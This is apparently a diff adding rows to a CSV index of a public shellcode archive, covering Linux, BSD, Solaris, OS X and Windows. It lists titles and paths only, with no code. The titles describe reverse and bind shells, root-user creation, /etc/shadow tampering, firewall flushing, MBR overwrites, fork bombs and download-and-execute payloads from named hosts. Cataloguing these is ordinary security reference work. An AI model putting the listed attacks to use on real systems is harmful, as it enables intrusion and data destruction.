+13397,shellcodes/lin_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,lin_x86 +13398,shellcodes/lin_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,shellcode,lin_x86 +13399,shellcodes/lin_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,lin_x86 +13400,shellcodes/lin_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,lin_x86 +13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator +13402,shellcodes/lin_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,lin_x86 +13403,shellcodes/lin_x86/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 +13404,shellcodes/lin_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 +13405,shellcodes/lin_x86/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 +13406,shellcodes/lin_x86/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 +13407,shellcodes/lin_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86 +13408,shellcodes/lin_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,lin_x86 +13409,shellcodes/lin_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,lin_x86 +13410,shellcodes/lin_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,lin_x86 +13411,shellcodes/lin_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,lin_x86 +13412,shellcodes/lin_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,lin_x86 +13413,shellcodes/lin_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,lin_x86 +13414,shellcodes/lin_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,lin_x86 +13415,shellcodes/lin_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,lin_x86 +13416,shellcodes/lin_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,lin_x86 +13417,shellcodes/lin_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,lin_x86 +13418,shellcodes/lin_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,lin_x86 +13419,shellcodes/lin_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,lin_x86 +13420,shellcodes/lin_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,lin_x86 +13421,shellcodes/lin_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,lin_x86 +13422,shellcodes/lin_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,lin_x86 +13423,shellcodes/lin_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,shellcode,lin_x86 +13424,shellcodes/lin_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,lin_x86 +13425,shellcodes/lin_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,lin_x86 +13426,shellcodes/lin_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,lin_x86 +13427,shellcodes/lin_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,lin_x86 +13428,shellcodes/lin_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 +13429,shellcodes/lin_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 +13430,shellcodes/lin_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,lin_x86 +13431,shellcodes/lin_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,lin_x86 +13432,shellcodes/lin_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,lin_x86 +13433,shellcodes/lin_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,lin_x86 +13434,shellcodes/lin_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,lin_x86 +13435,shellcodes/lin_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,lin_x86 +13436,shellcodes/lin_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,lin_x86 +13437,shellcodes/lin_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 +13438,shellcodes/lin_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,lin_x86 +13439,shellcodes/lin_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,lin_x86 +13440,shellcodes/lin_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,lin_x86 +13441,shellcodes/lin_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,lin_x86 +13442,shellcodes/lin_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86 +13443,shellcodes/lin_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13444,shellcodes/lin_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13445,shellcodes/lin_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13446,shellcodes/lin_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13447,shellcodes/lin_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,lin_x86 +13448,shellcodes/lin_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13449,shellcodes/lin_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13450,shellcodes/lin_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13451,shellcodes/lin_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,lin_x86 +13452,shellcodes/lin_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,lin_x86 +13453,shellcodes/lin_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,lin_x86 +13454,shellcodes/lin_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,lin_x86 +13455,shellcodes/lin_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86 +13456,shellcodes/lin_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,lin_x86 +13457,shellcodes/lin_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,lin_x86 +13458,shellcodes/lin_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,lin_x86 +13460,shellcodes/lin_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,lin_x86 +13461,shellcodes/lin_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,lin_x86 +13462,shellcodes/lin_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,lin_x86 +13463,shellcodes/lin_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,lin_x86-64 +13464,shellcodes/lin_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,lin_x86-64 +13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple +13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple +13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple +13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple +13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple +13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86 +13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 +13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 +13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86 +13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86 +13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes)",2006-05-01,hophet,shellcode,openbsd_x86 +13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86 +13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86 +13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc +13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc +13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc +13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86 +13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc +13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc +13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator +13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc +13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc +13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc +13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc +13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc +13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc +13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator +13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 +13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 +13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware +13504,shellcodes/win_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,shellcode,win_x86 +13505,shellcodes/win_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,win_x86 +13507,shellcodes/win_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,win_x86 +13508,shellcodes/win_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,win_x86 +13509,shellcodes/win_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,win_x86 +13510,shellcodes/win_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,win_x86 +13511,shellcodes/win_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,win_x86 +13512,shellcodes/win_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,win_x86 +13513,shellcodes/win_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,win_x86 +13514,shellcodes/win_x86/13514.asm,"Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,win_x86 +13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator +13516,shellcodes/win_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,win_x86 +13517,shellcodes/win_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,win_x86 +13518,shellcodes/win_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,win_x86 +13519,shellcodes/win_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,win_x86 +13520,shellcodes/win_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,win_x86 +13521,shellcodes/win_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,win_x86 +13522,shellcodes/win_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,win_x86 +13523,shellcodes/win_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,win_x86 +13524,shellcodes/win_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,win_x86 +13525,shellcodes/win_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,win_x86 +13526,shellcodes/win_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,win_x86 +13527,shellcodes/win_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,win_x86 +13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator +13529,shellcodes/win_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,win_x86 +13530,shellcodes/win_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,win_x86 +13531,shellcodes/win_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,shellcode,win_x86 +13532,shellcodes/win_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,win_x86 +13533,shellcodes/win_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,win_x86-64 +13548,shellcodes/lin_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,lin_x86 +13549,shellcodes/lin_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,lin_x86 +13550,shellcodes/lin_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,lin_x86 +13551,shellcodes/lin_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,lin_x86 +13553,shellcodes/lin_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,lin_x86 +13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows +13563,shellcodes/lin_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,lin_x86 +13565,shellcodes/win_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,win_x86 +13566,shellcodes/lin_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,lin_x86 +13569,shellcodes/win_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,win_x86 +13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86 +13571,shellcodes/win_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,win_x86 +13572,shellcodes/lin_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,lin_x86 +13574,shellcodes/win_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,win_x86 +13576,shellcodes/lin_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,lin_x86 +13577,shellcodes/lin_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,lin_x86 +13578,shellcodes/lin_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,lin_x86 +13579,shellcodes/lin_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,lin_x86 +13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows +13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows +13586,shellcodes/lin_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,lin_x86 +13595,shellcodes/win_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,win_x86 +13599,shellcodes/lin_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 +13600,shellcodes/lin_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 +13601,shellcodes/lin_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 +13602,shellcodes/lin_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 +13609,shellcodes/lin_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,lin_x86 +13614,shellcodes/win_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,win_x86 +13615,shellcodes/win_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,win_x86 +13627,shellcodes/lin_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,lin_x86 +13628,shellcodes/lin_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,lin_x86 +13630,shellcodes/win_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,win_x86 +13631,shellcodes/win_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,win_x86 +13632,shellcodes/lin_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,lin_x86 +13635,shellcodes/win_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,win_x86 +13636,shellcodes/win_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,win_x86 +13639,shellcodes/win_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,win_x86 +13642,shellcodes/win_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,win_x86 +13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows +13647,shellcodes/win_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,win_x86 +13648,shellcodes/win_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,win_x86 +13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows +13661,shellcodes/lin_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,shellcode,lin_x86 +13669,shellcodes/lin_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86 